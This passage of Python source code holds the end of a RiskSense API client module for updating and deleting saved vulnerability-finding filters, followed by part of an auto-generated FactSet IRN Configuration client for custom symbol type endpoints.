except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_unique_app_finding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved unique application finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_unique_host_finding_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved unique host finding filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.UNIQUE_HOST_FINDING, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def update_user_filter(self, filter_id, client_id=None, **kwargs):
"""
Updates an existing saved user filter.
:param filter_id: The filter ID to update.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
        :keyword name: A new name for the filter. String.
        :keyword filter_definition: A list of dicts containing the new filter parameters.
        :keyword shared: True/False reflecting whether or not the filter should be shared. Boolean.
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
:raises ValueError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.update(FilterSubject.USER, filter_id, client_id, **kwargs)
except (RequestFailed, StatusCodeError, MaxRetryError, ValueError):
raise
return returned_response
def delete(self, filter_subject, filter_id, client_id=None):
"""
Deletes a saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: FilterSubject attribute
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject) + "/{}".format(str(filter_id))
try:
self.request_handler.make_request(ApiRequestHandler.DELETE, url)
success = True
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return success
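    # Illustrative usage sketch (hypothetical filter ID): delete() builds the URL from
    # alt_api_base_url, the client ID, and the filter subject, issues a DELETE request,
    # and returns True only when the request did not raise.
    #
    #   if filters.delete(FilterSubject.HOST, filter_id=456):
    #       print("Saved host filter removed.")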
def delete_application_filter(self, filter_id, client_id=None):
"""
Delete a saved application filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_appfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved application finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_app_manual_exploit_filter(self, filter_id, client_id=None):
"""
Delete a saved application manual exploit filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_application_url_filter(self, filter_id, client_id=None):
"""
Delete a saved application URL filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.APPLICATION_URL, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_assessment_filter(self, filter_id, client_id=None):
"""
Delete a saved assessment filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.ASSESSMENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_client_filter(self, filter_id, client_id=None):
"""
Delete a saved client filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.CLIENT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_database_filter(self, filter_id, client_id=None):
"""
Delete a saved database filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.DATABASE, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_databasefinding_filter(self, filter_id, client_id=None):
"""
Delete a saved database finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.DATABASE_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_group_filter(self, filter_id, client_id=None):
"""
Delete a saved group filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.GROUP, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_host_filter(self, filter_id, client_id=None):
"""
Delete a saved host filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.HOST, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_hostfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved host finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_host_manual_exploit_filter(self, filter_id, client_id=None):
"""
Delete a saved host manual exploit filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.HOST_MANUAL_EXPLOIT, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_network_filter(self, filter_id, client_id=None):
"""
Delete a saved network filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.NETWORK, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_patch_filter(self, filter_id, client_id=None):
"""
Delete a saved patch filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.PATCH, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_tag_filter(self, filter_id, client_id=None):
"""
Delete a saved tag filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.TAG, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_unique_appfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved unique application finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.UNIQUE_APPLICATION_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_unique_hostfinding_filter(self, filter_id, client_id=None):
"""
Delete a saved unique host finding filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.UNIQUE_HOST_FINDING, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def delete_user_filter(self, filter_id, client_id=None):
"""
Delete a saved user filter.
:param filter_id: The filter ID to delete.
:type filter_id: int
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: True/False reflecting whether or not the operation was successful.
:rtype: bool
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.delete(FilterSubject.USER, filter_id, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
"""
Copyright 2020 RiskSense, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# --- Next source file: code/python/IRNConfiguration/v1/fds/sdk/IRNConfiguration/api/custom_symbols___types_api.py (repo: factset/enterprise-sdk, license: Apache-2.0) ---
"""
IRN API v1
Allows users to extract, create, update and configure IRN data. # noqa: E501
The version of the OpenAPI document: 1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.IRNConfiguration.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.IRNConfiguration.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.IRNConfiguration.exceptions import ApiException
from fds.sdk.IRNConfiguration.model.custom_symbol_custom_field_config_dto import CustomSymbolCustomFieldConfigDto
from fds.sdk.IRNConfiguration.model.custom_symbol_type_detail_dto import CustomSymbolTypeDetailDto
from fds.sdk.IRNConfiguration.model.custom_symbol_type_dto import CustomSymbolTypeDto
from fds.sdk.IRNConfiguration.model.new_item_dto import NewItemDto
from fds.sdk.IRNConfiguration.model.problem_details import ProblemDetails
from fds.sdk.IRNConfiguration.model.reorder_custom_symbol_type_dto import ReorderCustomSymbolTypeDto
from fds.sdk.IRNConfiguration.model.save_custom_symbol_type_dto import SaveCustomSymbolTypeDto
from fds.sdk.IRNConfiguration.model.update_custom_symbol_type_dto import UpdateCustomSymbolTypeDto
class CustomSymbolsTypesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.create_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': (
{ 201: (NewItemDto,), 400: (ProblemDetails,), 0: (ProblemDetails,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types',
'operation_id': 'create_custom_symbol_type',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'save_custom_symbol_type_dto',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'save_custom_symbol_type_dto':
(SaveCustomSymbolTypeDto,),
},
'attribute_map': {
},
'location_map': {
'save_custom_symbol_type_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json-patch+json',
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client
)
self.delete_custom_symbol_type_async_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}',
'operation_id': 'delete_custom_symbol_type_async',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (CustomSymbolTypeDetailDto,), 404: (ProblemDetails,), 0: (ProblemDetails,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}',
'operation_id': 'get_custom_symbol_type',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_custom_symbol_types_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: ([CustomSymbolTypeDto],), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types',
'operation_id': 'get_custom_symbol_types',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_symbol_custom_fields_for_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: ([CustomSymbolCustomFieldConfigDto],), 404: (ProblemDetails,), 0: (ProblemDetails,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}/custom-fields',
'operation_id': 'get_symbol_custom_fields_for_custom_symbol_type',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_custom_symbol_type_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/{customSymbolTypeId}',
'operation_id': 'update_custom_symbol_type',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'custom_symbol_type_id',
'update_custom_symbol_type_dto',
],
'required': [
'custom_symbol_type_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'custom_symbol_type_id':
(str,),
'update_custom_symbol_type_dto':
(UpdateCustomSymbolTypeDto,),
},
'attribute_map': {
'custom_symbol_type_id': 'customSymbolTypeId',
},
'location_map': {
'custom_symbol_type_id': 'path',
'update_custom_symbol_type_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json-patch+json',
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client
)
self.update_custom_symbol_type_order_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/custom-symbol-types/reorder',
'operation_id': 'update_custom_symbol_type_order',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'reorder_custom_symbol_type_dto',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'reorder_custom_symbol_type_dto':
(ReorderCustomSymbolTypeDto,),
},
'attribute_map': {
},
'location_map': {
'reorder_custom_symbol_type_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json-patch+json',
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client
)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def create_custom_symbol_type(
self,
**kwargs
) -> NewItemDto:
"""Create a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
NewItemDto
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
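    # Illustrative usage sketch (assumes a configured ApiClient; the DTO's constructor
    # arguments are assumptions, not taken from this file):
    #
    #   api = CustomSymbolsTypesApi(api_client)
    #   dto = SaveCustomSymbolTypeDto(name="Private Deals")  # hypothetical fields
    #   new_item = api.create_custom_symbol_type(save_custom_symbol_type_dto=dto)
    #   print(new_item)  # NewItemDto describing the created custom symbol type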
def create_custom_symbol_type_with_http_info(
self,
**kwargs
) -> typing.Tuple[NewItemDto, int, typing.MutableMapping]:
"""Create a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
NewItemDto
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def create_custom_symbol_type_async(
self,
**kwargs
) -> "ApplyResult[NewItemDto]":
"""Create a Custom symbol type # noqa: E501
        This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[NewItemDto]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
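    # The *_async variants return a multiprocessing.pool.ApplyResult immediately
    # instead of blocking. Illustrative sketch (reusing the hypothetical `dto` above):
    #
    #   async_result = api.create_custom_symbol_type_async(save_custom_symbol_type_dto=dto)
    #   new_item = async_result.get()  # blocks here until the HTTP call completes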
def create_custom_symbol_type_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[NewItemDto, int, typing.MutableMapping]]":
"""Create a Custom symbol type # noqa: E501
        This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
save_custom_symbol_type_dto (SaveCustomSymbolTypeDto): saveCustomSymbolTypeDto object to save. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(NewItemDto, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.create_custom_symbol_type_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async(
self,
custom_symbol_type_id,
**kwargs
) -> None:
"""Delete a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
None
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['custom_symbol_type_id'] = \
custom_symbol_type_id
return self.delete_custom_symbol_type_async_endpoint.call_with_http_info(**kwargs)
def delete_custom_symbol_type_async_with_http_info(
self,
custom_symbol_type_id,
**kwargs
) -> typing.Tuple[None, int, typing.MutableMapping]:
"""Delete a Custom symbol type # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
custom_symbol_type_id (str): customSymbolTypeId to delete associated record
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
